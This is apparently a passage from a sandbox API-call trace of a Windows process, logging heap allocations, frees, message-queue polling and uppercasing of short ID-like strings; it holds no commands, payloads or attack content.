(in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0199.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0199.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0199.513] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0199.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0199.513] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0199.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0199.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0199.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b13d8 [0199.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0199.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0199.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0199.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0199.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0199.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0199.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0199.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0199.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0199.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0199.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0199.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1a0 [0199.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0199.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0199.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0199.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0199.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0199.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0199.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0199.515] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0199.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0199.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0199.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0199.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0199.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0199.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0199.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0199.515] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0199.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0199.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0199.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0199.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0199.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0199.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0199.516] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0199.516] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0199.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0199.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0199.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0199.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0199.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0199.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0199.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.516] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.516] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0199.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0199.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0199.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0199.517] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.517] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.517] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0199.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0199.517] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0199.517] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0199.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0199.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0199.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0199.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0199.517] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0199.517] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.517] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0199.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0199.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0199.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0199.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0199.518] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0199.518] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0199.518] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0199.518] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0199.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0199.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0199.518] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0199.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0199.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0199.518] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0199.518] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0199.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0199.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0199.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0199.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0199.519] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0199.519] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.519] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0199.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0199.519] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0199.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0199.519] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0199.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0199.519] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0199.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0199.519] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0199.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0199.520] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0199.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0199.520] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0199.520] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0199.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0199.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0199.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0199.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0199.520] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0199.520] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.520] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0199.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0199.521] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0199.521] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0199.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0199.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0199.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0199.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0199.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0199.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0199.521] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0199.521] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0199.521] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0199.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0199.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0199.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0199.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0199.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0199.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0199.521] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.521] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0199.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0199.522] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0199.522] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0199.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0199.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0199.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0199.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0199.522] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0199.522] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.522] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0199.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0199.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0199.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0199.522] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.522] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.522] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0199.523] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0199.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0199.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0199.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0199.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0199.523] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.523] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0199.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0199.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0199.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0199.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0199.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0199.523] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.523] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.523] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0199.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0199.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0199.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0199.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0199.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0199.524] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0199.524] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0199.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0199.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 